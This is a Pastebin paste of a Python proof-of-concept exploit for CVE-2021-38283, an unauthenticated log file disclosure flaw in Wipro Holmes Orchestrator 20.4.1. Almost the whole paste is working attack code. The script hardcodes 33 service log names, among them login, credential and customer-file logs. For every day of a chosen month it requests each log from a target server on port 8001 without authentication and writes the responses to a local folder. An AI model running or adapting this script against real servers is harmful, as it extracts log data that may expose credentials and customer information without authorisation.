Advertisement
FlyFar

Wipro Holmes Orchestrator 20.4.1 - Log File Disclosure - 2021-38283

Jun 8th, 2024
372
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 3.31 KB | Cybersecurity | 0 0
  1. # Exploit Title: Wipro Holmes Orchestrator 20.4.1 - Log File Disclosure
  2. # Date: 09/08/2021
  3. # Exploit Author: Rizal Muhammed @ub3rsick
  4. # Vendor Homepage: https://www.wipro.com/holmes/
  5. # Version: Wipro Holmes Orchestrator v20.4.1
  6. # Tested on: Windows
  7. # CVE : CVE-2021-38283
  8.  
  9. import requests as rq
  10. import argparse
  11. import datetime
  12. import os
  13. from calendar import monthrange
  14. from multiprocessing.dummy import Pool as ThreadPool
  15. from functools import partial
  16.  
  17. # Change if running on different port
  18. port = 8001
  19. log_list = [
  20.     "AlertService.txt", "ApprovalService.txt", "AuditService.txt", "CustomerController.txt",
  21.     "CustomerDomainCredentialService.txt", "CustomerFile.zip", "CustomerService.txt",
  22.     "DashboardController.txt", "DataParseService.txt", "DomainService.txt", "ExecutionService.txt",
  23.     "ExternalAPIService.txt", "FilesController.txt", "FormService.txt", "InfrastructureService.txt",
  24.     "ITSMConfigPrepService.txt", "LicenseService.txt", "LoginService.txt", "MailService.txt",
  25.     "MasterdataController.txt", "NetworkService.txt", "OrchestrationPreparationService.txt",
  26.     "ProblemInfrastructureService.txt", "ProcessExecutionService.txt", "ServiceRequestService.txt",
  27.     "SolutionController.txt", "SolutionLiveService.txt", "SolutionService.txt", "StorageService.txt",
  28.     "TaskService.txt", "TicketingService.txt", "UserController.txt", "UtilityService.txt"
  29. ]
  30.  
  31. def check_month(val):
  32.     ival = int(val)
  33.     if ival > 0 and ival < 13:
  34.         return ival
  35.     else:
  36.         raise argparse.ArgumentTypeError("%s is not a valid month" % val)
  37.  
  38. def check_year(val):
  39.     iyear = int(val)
  40.     if iyear >= 1960 and iyear <= datetime.date.today().year:
  41.         return iyear
  42.     else:
  43.         raise argparse.ArgumentTypeError("%s is not a valid year" % val)
  44.  
  45. def do_request(target, date, log_file):
  46.     log_url = f"http://{target}/log/{date}/{log_file}"
  47.     log_name = f"{date}_{log_file}"
  48.     print(f"[*] Requesting Log: /log/{date}/{log_file}")
  49.     resp = rq.get(log_url)
  50.     if resp.status_code == 200 and not "Wipro Ltd." in resp.text:
  51.         print(f"[+] Success: {log_url}")
  52.         with open(f"logs/{log_name}", 'w') as lf:
  53.             lf.write(resp.text)
  54.         print(f"[*] Log File Written to ./logs/{log_name}")
  55.  
  56. def main():
  57.     parser = argparse.ArgumentParser(description="Wipro Holmes Orchestrator 20.4.1 Unauthenticated Log File Disclosure",
  58.                                      epilog="Vulnerability Discovery, PoC Author - Rizal Muhammed @ub3sick")
  59.     parser.add_argument("-t", "--target-ip", help="IP Address of the target server", required=True)
  60.     parser.add_argument("-m", "--month", help="Month of the log, (1=JAN, 2=FEB etc.)", required=True, type=check_month)
  61.     parser.add_argument("-y", "--year", help="Year of the log", required=True, type=check_year)
  62.     args = parser.parse_args()
  63.  
  64.     ndays = monthrange(args.year, args.month)[1]
  65.     date_list = [f"{datetime.date(args.year, args.month, day)}" for day in range(1, ndays + 1)]
  66.     target = f"{args.target_ip}:{port}"
  67.  
  68.     # Create folder "logs" to save log files, if it does not exist
  69.     if not os.path.exists("./logs"):
  70.         os.makedirs("./logs")
  71.  
  72.     for log_date in date_list:
  73.         for log_file in log_list:
  74.             do_request(target, log_date, log_file)
  75.  
  76. if __name__ == "__main__":
  77.     main()
  78.            
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement